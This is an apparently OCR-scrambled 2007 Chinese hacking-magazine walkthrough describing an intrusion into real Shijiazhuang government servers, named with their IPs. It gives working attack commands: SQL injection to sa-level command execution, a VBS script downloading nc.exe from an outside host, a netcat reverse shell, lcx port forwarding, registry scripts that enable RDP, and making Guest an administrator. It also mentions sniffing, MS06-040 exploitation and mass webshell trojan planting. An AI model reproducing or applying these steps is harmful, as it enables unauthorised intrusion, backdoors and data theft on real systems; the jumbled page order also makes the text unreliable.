经典重现看菜鸟如何入侵内网

这个时候我们要做的事就是开启3389端口。 Windows 2003开启3389的方法很简单，并且不用重 启机器。我们只要输入以下的脚本就可以了。
echo Windows Registry Editor Version 5.00 >3389.reg echo. >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon trolSet\Control\Terminal Server] >>3389.reg echo "fDenyTSConnections"=dword:00000000 >>3389. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >> 3389.reg echo "PortNumber"=dword:00000d3d >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 3389.reg echo "PortNumber"=dword:00000d3d >>3389.reg
漏 EXPLOIT ATTACK & DEFENCE 〉栏目编辑 〉脚本小子 〉scr iptsboy@hacker.com.cn
洞
攻
防
适合读者：入侵爱好者 前置知识：无
经典重现看菜鸟如何入侵内网
文/图 cnbird[H.U.C]河北泊头杨宁
这次我要带给大家的是如何通过一次SQL注入 点到最后的入侵内网，同时给内网的机器开3389的精 彩教程，希望大家能够喜欢。相信黑防里面高手如云， 对于入侵内网是小菜一碟，但是毕竟我也属于菜鸟 之列，所以这篇文章只是写给和我一样的菜鸟的，高 手就请略过吧。废话不多说，我们直接进入正题。
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"): xPost.Open ^"GET^",^"http://www.bttmjx.com/nc.exe^",0: xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet. Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost. responseBody):sGet.SaveToFile ^"c:\nc.exe^",2 >c:\down. vbs
依次在NBSI里面输入以上命令，成功执行后，结 果如图7所示，明明终端端口是3389啊。忽然有个念 头在我脑海里闪过，难道这就是传说中的内网机 器？赶紧输入“ipconfig –all”查看，结果如图8所示， 果然是内网，难怪如此！
图8 首先上传加密版的nc.exe和lcx.exe。怎么上传 呢？其实NBSI自带有上传功能，但是我感觉太慢了， 它是先把EXE文件转化成VBS格式的，上传成功后再 利用Debug来还原，操作麻烦，我不喜欢，还是自己写 一个脚本直接下载吧，脚本内容如下。
图6
Echo Dim ReadComputerName >>port.vbs Echo Set ReadComputerName=WScript. CreateObject ("WScript.Shell") >>port.vbs Echo Dim TSName,TSRegPath >>port.vbs Echo TSRegPath="HKLM\System\CurrentControlSet\Con trol\Terminal Server\WinStations\RDP-Tcp\PortNumber" >> port.vbs Echo TSName=ReadComputerName.RegRead(TSRegPath) >>port.vbs Echo WScript.Echo("TermService port is:"^&TSName) >>port.vbs Cscript port.vbs
这段代码的意思是利用XMLHTTP脚本来下载文 件。我把nc.exe放到了我公司的网站上，希望大家不 要来黑我公司的网站啊！直接在NBSI中输入，如图9 所示，不用管这个弹出的窗口，因为是用echo命令来 执行的，肯定不会有回显的，我们下次执行命令的时 候只要把回显打上勾就可以了。成功执行命令后，再 执行“cscript down.vbs”就能很顺利地下载nc.exe和 lcx.exe了，如图10所示，下载成功。
图4 图1
图2
图3
24
ww w.h acke r.c om.cn
防 黑客 线 2007.08
HACKER DEFENCE
图5
曲折之路
有了能执行命令的sa权限，我们还愁什么事干 不成呢？执行“netstat –an”看看有没有开放3389端 口，结果确认开放了3389。那剩下的事就好办了，我 们直接加个用户和密码就可以了，依次在NBSI中输入 “net user guest /active”、“net user guest guest”、“net localgroup administrators guest /add”。添加成功之 后，我以为到这里入侵就会结束了呢。打开3389终端 连接器，兴高采烈地输入IP地址，结果如图6所示，气 死我了，明明开了3389，为什么不能连接上呢？难道
发现SQL注入点
SQL注入自从2001年被国外的某个牛人发现以 后，多少服务器死在了它的手下早已无从统计。2003
年SQL注入正式在国内风靡，虽然过去4年了，但是 SQL注入依然是拿到服务器权限的一种重要手段。
某日，我正在Google徘徊的时候，发现一目标— —石家庄政府网www.sjz.gov.cn，想来政府网站的 主机配置应该不错的，就拿它作为我们今天的测试 目标吧。大概浏览了一下网站，貌似这个网站使用的 是自由动力整站程序，试了自由动力的几个漏洞都 没有成功。
到了这里，接下来的事情就是进行Cain嗅探监视 网络数据包，以便渗透其他内部机器了。Cain就让它 去运行吧，好不容易连接上，就把X-Scan也安装上， 扫扫内网看看有什么有漏洞的机器没有。结果让我 大吃一惊，基本上每台机器都有漏洞，而且都是可以 直接拿到系统权限的，如图15所示。我用MS06-040入 侵了几台机器，用MS SQL弱口令也搞定了几台。到这 里我就不详细地讲解了，毕竟是石家庄政府网，我可 不想搞得太过分了，帮忙把网站存在的SQL注入漏洞 补上，这样服务器就安全多了。
然后执行“regedit /s 3389.reg”就OK了，执行的 结果如图12所示，成功开放了3389端口，此时就可以 用lcx.exe来进行终端的连接了。
图10 接下来的事情应该就简单了吧？在本地的CMD 中输入“nc vv l p 246”，意思是监听本地的246端 口，然后在NBSI中输入“nc –e cmd.exe 本机IP 246” 就可以了。相信nc.exe的强大功能大家都会了，我就 不多说了。端口反弹成功后，我们要做的事就是用 lcx.exe来进行3389端口的连接了。
26
ww w.h acke r.c om.cn
防 黑客 线 2007.08
HACKER DEFENCE
漏 EXPLOIT ATTACK & DEFENCE 〉栏目编辑 〉脚本小子 〉scr iptsboy@hacker.com.cn
洞
攻
防
图13
图14
图15 最后我再罗嗦一下，如何在拿到sa权限或者是溢 出以后开对方的3389，网上教程很多，但我认为不是 很经典，下面就给大家介绍一种经典的方法，150% 次次成功。这里我就以一个内网的sa弱口令来详细讲 解如何开启Windows 2000 Server的3389端口。 如图16所示，172.16.1.4这台机器的3389端口没 有开放，存在sa弱口令漏洞，那么我们就可以在MS SQL弱口令利用工具中输入以下脚本。
漏 EXPLOIT ATTACK & DEFENCE 〉栏目编辑 〉脚本小子 〉scr iptsboy@hacker.com.cn
洞
攻
防
修改端口了？或许吧，没准管理员是个高手呢。那怎 么才能知道机器开放的终端端口为多少呢？这里我 给大家提供一个脚本。
利用反弹连接3389。这种反弹连接最经典的莫过于 lcx.exe了，下面我就来详细地讲解一下步骤。
图1所示。打开网站一看，原来是河北政府采购网，进 入注入点后，让我大跌眼睛，竟然是sa的权限，如图2 所示。不过我们今天的目标不是它，就放到以后再说 吧，我们继续回到石家庄政府网站。当我来到石家庄 政府在线访问系统的时候，啊D找到了两个注入点， 如图3所示。这个系统的IP地址为221.194.12.19，而 www.sjz.gov.cn的IP地址为221.194.12.36，虽然不 是一个IP地址，但我们可以得到一个重要的情报，就 是它们在一个网段内。这个时候我的思路就清晰了 起来，我们可以先入侵分站，然后通过嗅探的方法得 到我们需要的信息。
那就请出啊D看看有没有注入点吧，结果没有发 现www.sjz.gov.cn的漏洞，但却有了意外的收获，如
HACKER DEFENCE
ww w.h acke r.c om.cn
防 2007.08 黑客 线
23
漏
洞
攻
防 EXPLOIT ATTACK & DEFENCE 〉栏目编辑 〉脚本小子 〉scr iptsboy@hacker.com.cn
echo "Enabled"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microso ft\Windows NT\CurrentVersion\Winlogon] >>3389.reg echo "ShutdownWithoutLogon"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies \Microsoft\Windows\Installer] >>3389.reg echo "EnableAdminTSRemote"=dword:00000001 >>3389. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Control\Terminal Server] >>3389.reg echo "TSEnabled"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr olSet\Services\TermDD] >>3389.reg echo "Start"=dword:00000002 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Services\TermService] >>3389.reg echo "Start"=dword:00000002 >>3389.reg echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Togg le] >>3389.reg echo "Hotkey"="1" >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >> 3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg
有了思路就好办了，我们先看看刚才发现的注 入点是什么类型的注入吧。结果总是那么的让人出 乎意料，居然又是sa权限，如图4所示。先看看我们能 不能执行命令吧，结果啊D中不能执行，那就换成NBSI 试试吧，如图5所示，出现了我们想要的结果了。因为 能直接执行命令，我们就不用上传WebShell了，等拿 到3389系统权限以后，再把一句话木马插入到某个 文件中，这样就有了和PHP一句话插入所有PHP文件 一样的做法了。具体的操作就是利用WebShell批量挂 马功能就行了，这里我就不多罗嗦了。
图16
echo Windows Registry Editor Version 5.00 >3389.reg echo. >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microso ft\Windows\CurrentVersion\netcache] >>3389.reg
峰回路转 在反弹回来的Shell中输入一些常用的命令，确认 服务器操作系统是Windows 2003。我们在开始的时 候发现这台主机开放了终端服务器，但在利用lcx. exe转发过程中最终确认是3389的端口没有开放，所 以导致连接不成功，如图11所示。
图11
图12 成功连接内网
开放3389以后，我们用lcx.exe来进行连接。先在 本地输入“C:\Documents and Settings\new\桌面> lcx -listen 51 3333”，意思就是开个3333端口进行 准备连接，因为我的3389端口已经开放了。下面在服 务器上执行，结果如图13所示，已经有反应了。我们 连接本地的3333端口看一下，终于成功了。不过别太 高兴了，我们现在还没有账号呢！打开NBSI，直接将 Guest账户激活，然后加入administrators组就可以了。如 图14所示，我们终于成功登录3389了！
图7
陷入困境 知道了是内网的机器又该怎么办呢？思路是很 简单，就是利用执行命令反弹到本地的机器上，然后
图9
HACKER DEFENCE
ww w.h acke r.c om.cn
防 2007.08 黑客 线
25
Hale Waihona Puke Baidu 漏
洞
攻
防 EXPLOIT ATTACK & DEFENCE 〉栏目编辑 〉脚本小子 〉scr iptsboy@hacker.com.cn